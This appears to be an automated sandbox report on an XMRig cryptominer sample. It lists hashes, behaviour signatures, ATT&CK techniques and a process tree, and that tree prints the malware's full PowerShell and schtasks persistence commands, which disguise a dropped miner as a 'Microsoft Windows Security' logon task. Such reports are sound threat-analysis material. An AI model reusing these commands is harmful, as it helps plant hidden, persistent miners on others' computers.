xmrig | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

Analysis

max time kernel
149s
max time network
144s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27/10/2024, 00:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0x0006000000016d4e-54.exe
Size

10KB
MD5

96509ab828867d81c1693b614b22f41d
SHA1

c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256

a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512

ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
SSDEEP

96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd

Score

10^/10

xmrig discovery execution miner

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 2640 created 1236	2640	3621011599.exe	21
PID 2640 created 1236	2640	3621011599.exe	21
PID 1948 created 1236	1948	winupsecvmgr.exe	21
PID 1948 created 1236	1948	winupsecvmgr.exe	21
PID 1948 created 1236	1948	winupsecvmgr.exe	21

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral1/memory/1948-36-0x000000013F510000-0x000000013FAA7000-memory.dmp	xmrig
behavioral1/memory/1268-39-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-41-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-43-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-45-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-47-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-49-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-51-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-53-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-55-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-57-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-59-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/1268-61-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2640	3621011599.exe
1948	winupsecvmgr.exe

Loads dropped DLL 2 IoCs

pid	Process
1564	0x0006000000016d4e-54.exe
3012	taskeng.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2804	powershell.exe
2708	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1948 set thread context of 992	1948	winupsecvmgr.exe	41
PID 1948 set thread context of 1268	1948	winupsecvmgr.exe	42

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0x0006000000016d4e-54.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2408	schtasks.exe
1936	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2640	3621011599.exe
2640	3621011599.exe
2804	powershell.exe
2640	3621011599.exe
2640	3621011599.exe
1948	winupsecvmgr.exe
1948	winupsecvmgr.exe
2708	powershell.exe
1948	winupsecvmgr.exe
1948	winupsecvmgr.exe
1948	winupsecvmgr.exe
1948	winupsecvmgr.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeLockMemoryPrivilege	1268	dwm.exe
Token: SeLockMemoryPrivilege	1268	dwm.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe
1268	dwm.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1564 wrote to memory of 2640	1564	0x0006000000016d4e-54.exe	30
PID 1564 wrote to memory of 2640	1564	0x0006000000016d4e-54.exe	30
PID 1564 wrote to memory of 2640	1564	0x0006000000016d4e-54.exe	30
PID 1564 wrote to memory of 2640	1564	0x0006000000016d4e-54.exe	30
PID 2804 wrote to memory of 2408	2804	powershell.exe	33
PID 2804 wrote to memory of 2408	2804	powershell.exe	33
PID 2804 wrote to memory of 2408	2804	powershell.exe	33
PID 3012 wrote to memory of 1948	3012	taskeng.exe	37
PID 3012 wrote to memory of 1948	3012	taskeng.exe	37
PID 3012 wrote to memory of 1948	3012	taskeng.exe	37
PID 2708 wrote to memory of 1936	2708	powershell.exe	40
PID 2708 wrote to memory of 1936	2708	powershell.exe	40
PID 2708 wrote to memory of 1936	2708	powershell.exe	40
PID 1948 wrote to memory of 992	1948	winupsecvmgr.exe	41
PID 1948 wrote to memory of 1268	1948	winupsecvmgr.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1236
- C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe
  "C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Users\Admin\AppData\Local\Temp\3621011599.exe
    C:\Users\Admin\AppData\Local\Temp\3621011599.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2408
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1936
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:992
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1268

C:\Windows\system32\taskeng.exe
taskeng.exe {ED16319A-B46C-4A9C-8A20-01941478863C} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
  "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
66a8cf3f9cb8348dcfc201eb2d42924a

SHA1
fd04f7e8f6ca208c03662f4d3f1324d686a732ce

SHA256
798c8fddd54b5f0812c9b0428176e8cad353616d8541d4c2f9625338f6cf28b7

SHA512
dc9c41cab8cf34f7ac5b2649b62d0bda5251765395b15d16f39442d091e018d0aae656b51858b237ccdfc826e09eedc13267fdbc26cc086e133d2026e8b240a3

Download Submit
\Users\Admin\AppData\Local\Temp\3621011599.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
memory/992-38-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/992-40-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1268-37-0x0000000000230000-0x0000000000250000-memory.dmp

Filesize
128KB

Download
memory/1268-55-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-49-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-47-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-45-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-41-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-53-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-51-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-43-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-57-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-59-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-61-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1268-39-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1948-36-0x000000013F510000-0x000000013FAA7000-memory.dmp

Filesize
5.6MB

Download
memory/2640-20-0x000000013F280000-0x000000013F817000-memory.dmp

Filesize
5.6MB

Download
memory/2708-31-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2708-30-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2804-17-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-16-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-15-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-13-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-14-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-10-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2804-11-0x0000000001D40000-0x0000000001D48000-memory.dmp

Filesize
32KB

Download
memory/2804-12-0x000007FEF5830000-0x000007FEF61CD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-9-0x000007FEF5AEE000-0x000007FEF5AEF000-memory.dmp

Filesize
4KB

Download